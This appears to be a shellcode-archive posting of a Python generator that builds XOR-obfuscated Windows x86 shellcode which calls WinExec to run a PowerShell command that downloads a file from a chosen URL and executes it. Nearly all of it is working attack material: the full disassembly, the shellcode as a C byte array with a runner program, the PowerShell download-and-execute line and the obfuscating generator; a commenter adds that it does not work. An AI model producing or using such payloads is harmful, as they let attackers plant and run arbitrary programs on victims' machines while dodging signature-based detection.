Shellcode Win x86-64 - Download & execute (Generator)

[Kalashnikov.]

#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [use PowerShell] - Generator

#length: Dynamic ! depend on url and filename

#Date: 20 January 2015

#Author: Ali Razmjoo

#tested On: Windows 7 x64 ultimate

#WinExec => 0x77b1e695

#ExitProcess => 0x77ae2acf

#====================================

#Execute :

#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"

#====================================

#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']

#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami

####################################################

#How it work ?

'''

C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"

Enter url

Example: http://z3r0d4y.com/file.exe

Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe

Enter filename

Example: D:\file.exe

Enter:C:\Ali.exe

C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o

C:\Users\Ali\Desktop>objdump -D shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:

0: 31 c0 xor %eax,%eax

2: 50 push %eax

3: 68 41 41 65 22 push $0x22654141

8: 58 pop %eax

9: c1 e8 08 shr $0x8,%eax

c: c1 e8 08 shr $0x8,%eax

f: 50 push %eax

10: b8 34 47 0b 4d mov $0x4d0b4734,%eax

15: bb 5d 69 6e 35 mov $0x356e695d,%ebx

1a: 31 d8 xor %ebx,%eax

1c: 50 push %eax

1d: b8 43 32 10 22 mov $0x22103243,%eax

22: bb 79 6e 51 4e mov $0x4e516e79,%ebx

27: 31 d8 xor %ebx,%eax

29: 50 push %eax

2a: b8 60 05 42 32 mov $0x32420560,%eax

2f: bb 49 78 79 71 mov $0x71797849,%ebx

34: 31 d8 xor %ebx,%eax

36: 50 push %eax

37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax

3c: bb 6a 64 49 33 mov $0x3349646a,%ebx

41: 31 d8 xor %ebx,%eax

43: 50 push %eax

44: b8 07 3e 0b 40 mov $0x400b3e07,%eax

49: bb 46 52 62 6e mov $0x6e625246,%ebx

4e: 31 d8 xor %ebx,%eax

50: 50 push %eax

51: b8 44 0a 78 07 mov $0x7780a44,%eax

56: bb 63 49 42 5b mov $0x5b424963,%ebx

5b: 31 d8 xor %ebx,%eax

5d: 50 push %eax

5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax

63: bb 6a 31 67 2d mov $0x2d67316a,%ebx

68: 31 d8 xor %ebx,%eax

6a: 50 push %eax

6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax

70: bb 61 4c 39 67 mov $0x67394c61,%ebx

75: 31 d8 xor %ebx,%eax

77: 50 push %eax

78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax

7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx

82: 31 d8 xor %ebx,%eax

84: 50 push %eax

85: b8 45 40 41 66 mov $0x66414045,%eax

8a: bb 3d 78 77 49 mov $0x4977783d,%ebx

8f: 31 d8 xor %ebx,%eax

91: 50 push %eax

92: b8 02 1f 4b 45 mov $0x454b1f02,%eax

97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx

9c: 31 d8 xor %ebx,%eax

9e: 50 push %eax

9f: b8 24 3e 19 32 mov $0x32193e24,%eax

a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx

a9: 31 d8 xor %ebx,%eax

ab: 50 push %eax

ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax

b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx

b6: 31 d8 xor %ebx,%eax

b8: 50 push %eax

b9: b8 1f 37 40 24 mov $0x2440371f,%eax

be: bb 6d 52 32 41 mov $0x4132526d,%ebx

c3: 31 d8 xor %ebx,%eax

c5: 50 push %eax

c6: b8 2e 35 68 31 mov $0x3168352e,%eax

cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx

d0: 31 d8 xor %ebx,%eax

d2: 50 push %eax

d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax

d8: bb 67 6e 69 61 mov $0x61696e67,%ebx

dd: 31 d8 xor %ebx,%eax

df: 50 push %eax

e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax

e5: bb 4f 45 62 33 mov $0x3362454f,%ebx

ea: 31 d8 xor %ebx,%eax

ec: 50 push %eax

ed: b8 20 57 1d 45 mov $0x451d5720,%eax

f2: bb 47 78 63 36 mov $0x36637847,%ebx

f7: 31 d8 xor %ebx,%eax

f9: 50 push %eax

fa: b8 04 6a 24 3b mov $0x3b246a04,%eax

ff: bb 77 44 4b 49 mov $0x494b4477,%ebx

104: 31 d8 xor %ebx,%eax

106: 50 push %eax

107: b8 18 0f 0a 32 mov $0x320a0f18,%eax

10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx

111: 31 d8 xor %ebx,%eax

113: 50 push %eax

114: b8 7d 18 3c 27 mov $0x273c187d,%eax

119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx

11e: 31 d8 xor %ebx,%eax

120: 50 push %eax

121: b8 03 44 60 60 mov $0x60604403,%eax

126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx

12b: 31 d8 xor %ebx,%eax

12d: 50 push %eax

12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax

133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx

138: 31 d8 xor %ebx,%eax

13a: 50 push %eax

13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax

140: bb 6c 37 47 45 mov $0x4547376c,%ebx

145: 31 d8 xor %ebx,%eax

147: 50 push %eax

148: b8 59 07 12 0e mov $0xe120759,%eax

14d: bb 35 68 73 6a mov $0x6a736835,%ebx

152: 31 d8 xor %ebx,%eax

154: 50 push %eax

155: b8 01 59 11 2c mov $0x2c115901,%eax

15a: bb 45 36 66 42 mov $0x42663645,%ebx

15f: 31 d8 xor %ebx,%eax

161: 50 push %eax

162: b8 22 22 4e 5a mov $0x5a4e2222,%eax

167: bb 4c 56 67 74 mov $0x7467564c,%ebx

16c: 31 d8 xor %ebx,%eax

16e: 50 push %eax

16f: b8 00 37 1b 48 mov $0x481b3700,%eax

174: bb 43 5b 72 2d mov $0x2d725b43,%ebx

179: 31 d8 xor %ebx,%eax

17b: 50 push %eax

17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax

181: bb 64 48 47 71 mov $0x71474864,%ebx

186: 31 d8 xor %ebx,%eax

188: 50 push %eax

189: b8 6a 23 03 18 mov $0x1803236a,%eax

18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx

193: 31 d8 xor %ebx,%eax

195: 50 push %eax

196: b8 2d 54 57 1c mov $0x1c57542d,%eax

19b: bb 47 31 34 68 mov $0x68343147,%ebx

1a0: 31 d8 xor %ebx,%eax

1a2: 50 push %eax

1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax

1a8: bb 39 38 79 38 mov $0x38793839,%ebx

1ad: 31 d8 xor %ebx,%eax

1af: 50 push %eax

1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax

1b5: bb 79 57 51 61 mov $0x61515779,%ebx

1ba: 31 d8 xor %ebx,%eax

1bc: 50 push %eax

1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax

1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx

1c7: 31 d8 xor %ebx,%eax

1c9: 50 push %eax

1ca: b8 2c 18 08 54 mov $0x5408182c,%eax

1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx

1d4: 31 d8 xor %ebx,%eax

1d6: 50 push %eax

1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax

1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx

1e1: 31 d8 xor %ebx,%eax

1e3: 50 push %eax

1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax

1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx

1ee: 31 d8 xor %ebx,%eax

1f0: 50 push %eax

1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax

1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx

1fb: 31 d8 xor %ebx,%eax

1fd: 50 push %eax

1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax

203: bb 39 44 61 4f mov $0x4f614439,%ebx

208: 31 d8 xor %ebx,%eax

20a: 50 push %eax

20b: 89 e0 mov %esp,%eax

20d: bb 41 41 41 01 mov $0x1414141,%ebx

212: c1 eb 08 shr $0x8,%ebx

215: c1 eb 08 shr $0x8,%ebx

218: c1 eb 08 shr $0x8,%ebx

21b: 53 push %ebx

21c: 50 push %eax

21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx

222: ff d3 call *%ebx

224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx

229: ff d3 call *%ebx

C:\Users\Ali\Desktop>

#you have your shellcode now

=======================================

shellcode.c

#include <stdio.h>

#include <string.h>

int main(){

unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";

fprintf(stdout,"Length: %d\n\n",strlen(shellcode));

(*(void(*)()) shellcode)();

}

=======================================

C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe

C:\Users\Ali\Desktop>shellcode.exe

Length: 173

C:\Users\Ali\Desktop>

#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second

'''

import random,binascii

chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'

p1 = '''xor eax,eax

push eax

'''

p2 = '''

mov eax,esp

mov ebx,0x01414141

shr ebx,0x08

shr ebx,0x08

shr ebx,0x08

push ebx

push eax

mov ebx,0x77b1e695

call ebx

mov ebx,0x77ae2acf

call ebx

'''

sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))

sen1 = sen1.rsplit()

sen1 = sen1[0]

sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))

sen2 = sen2.rsplit()

sen2 = sen2[0]

sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)

m = 0

for word in sen:

m += 1

m = m - 1

stack = ''

while(m>=0):

stack += sen[m]

m -= 1

stack = stack.encode('hex')

skip = 1

if len(stack) % 8 == 0:

skip = 0

if skip is 1:

stack = '00' + stack

if len(stack) % 8 == 0:

skip = 0

if skip is 1:

stack = '00' + stack

if len(stack) % 8 == 0:

skip = 0

if skip is 1:

stack = '00' + stack

if len(stack) % 8 == 0:

skip = 0

if len(stack) % 8 == 0:

zxzxzxz = 0

m = len(stack) / 8

c = 0

n = 0

z = 8

shf = open('shellcode.asm','w')

shf.write(p1)

shf.close()

shf = open('shellcode.asm','a')

while(c<m):

v = 'push 0x' + stack[n:z]

skip = 0

if '0x000000' in v:

skip = 1

q1 = v[13:]

v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'

if '0x0000' in v:

skip = 1

q1 = v[11:]

v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'

if '0x00' in v:

skip = 1

q1 = v[9:]

v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'

if skip is 1:

shf.write(v)

if skip is 0:

v = v.rsplit()

zzz = ''

for w in v:

if '0x' in w:

zzz = str(w)

s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))

s1 = '0x%s'%s1

data = "%x" % (int(zzz, 16) ^ int(s1, 16))

v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)

shf.write(v)

n += 8

z += 8

c += 1

shf.write(p2)

shf.close()

[thomas_jan]

Not Workiing !!!!!!!!!!!!!!!!